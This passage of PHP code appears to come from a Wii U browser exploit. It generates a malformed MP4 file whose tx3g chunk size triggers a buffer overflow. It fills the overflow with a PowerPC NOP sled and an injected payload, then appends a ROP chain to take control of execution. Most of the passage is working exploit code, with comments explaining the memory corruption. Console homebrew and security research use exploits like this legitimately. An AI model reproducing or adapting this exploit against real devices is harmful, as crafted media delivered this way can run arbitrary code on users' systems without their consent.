for($i=0;$i<$first_tx3g_size-8;$i+=4)//Setup the data which will get copied to the output buffer during buf-overflow. The allocated buffer is actually 4-bytes. This will overwrite the stack for the current thread, on the heap.
{
if($i<0x6000)
{
if($i<0x1000)
{
$writeval=0x60000000;//powerpc nop instruction
}
/*elseif($i<0x2000)
{
$writeval=0x44444444;
}
elseif($i<0x3000)
{
$writeval=0x55555555;
}
elseif($i<0x4000)
{
$writeval=0x66666666;
}*/
elseif($i<0x5000)
{
//$writeval = 0x77777777;
$payload=wiiuhaxx_generatepayload();
if($payload===FALSE)
{
header("HTTP/1.1 500 Internal Server Error");
die("The payload binary doesn't exist / is invalid.\n");
}
$con.=$payload;
$i+=strlen($payload)-4;
if($i+4>=0x6000)
{
header("HTTP/1.1 500 Internal Server Error");
die("The payload binary is too large.\n");
}
while($i+4<0x5000)
{
$con.=pack("N*",0x90909090);
$i+=4;
}
continue;
}
else
{
$writeval=0x58585858;
}
}
elseif($i<$tx3g_ropchain_start)
{
$writeval=$ROP_POPJUMPLR_STACK12;
}
elseif($i==$tx3g_ropchain_start)
{
$con.=pack("N*",$ROP_POPJUMPLR_STACK12);
$con.=pack("N*",0x48484848);//If LR ever gets loaded from here there's no known way to recover from that automatically, this code would need manually adjusted if that ever happens. Hopefully this doesn't ever happen.
$i+=0x8;
$con.=$ROPCHAIN;
$i+=strlen($ROPCHAIN)-4;
if($i+4>$first_tx3g_size-8)
{
header("HTTP/1.1 500 Internal Server Error");
$pos=($i+4)-($first_tx3g_size-8);
die("The generated ROP-chain is $pos bytes too large.\n");
}
continue;
}
else
{
$writeval=0x48484848;
}
$con.=pack("N*",$writeval);
}
$con.=pack("N*",0x1c5);//Setup the mdia chunk.
$con.=pack("N*",0x6d646961);
$con.=pack("N*",0x1);//Setup the second tx3g chunk: size+chunkid, followed by the actual chunk size in u64 form.
$con.=pack("N*",0x74783367);
$con.=pack("N*",0x1);
$con.=pack("N*",0x100000000-$first_tx3g_size);//Haxx buffer alloc size passed to the memalloc code is 0x100000000.
for($i=0;$i<0x2000;$i+=4)//Old stuff, probably should be removed(testing is required for that).